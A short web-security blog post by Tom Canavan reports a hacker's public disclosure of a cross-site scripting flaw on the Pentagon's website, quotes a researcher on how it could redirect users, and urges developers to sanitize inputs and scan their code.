Hacker exposes XSS flaw on Pentagon website

In a recent Darkreading.com (http://tinyurl.com/yls9s92) article, a hacker by the name Ne0h has exposed a flaw in the Pentagon's public website. Ne0h demonstrated this attack on his blog posting - http://tinyurl.com/ye5847b.

Why this is important is simply as a reminder that even sites with multibillion dollar budgets can have problems. In the case of the pentagon this XSS while somewhat just a demonstration, is important because a flaw was discovered, and surely will lead many more people to try to attack.

According to the article, "Daniel Kennedy, partner with Praetorian Security Group, says the session ID appears to be a tracking cookie, and JavaScript can be injected into the page itself to redirect a user to another site, for instance. "Since I can pass that page a reference to an external JavaScript, I can do most anything I can do in JavaScript," says Kennedy, who blogged about the find yesterday. "That includes basic stuff, like crafting a URL to send to users that appears to be from the Pentagon, but actually redirects to 'evil.org,'" for example, he says." (source:http://tinyurl.com/yls9s92)

This quick blog post is simply to remind you to SANITIZE your inputs and use a 3rd party tool to scan your code.

Until next time - Be Safe!

Tom Canavan is author of the book Joomla! Websecurity, a frequent speaker and writer on the topic of web security and manages http://www.JoomlaRescue.com as well as manages www.PotentiaHosting.com.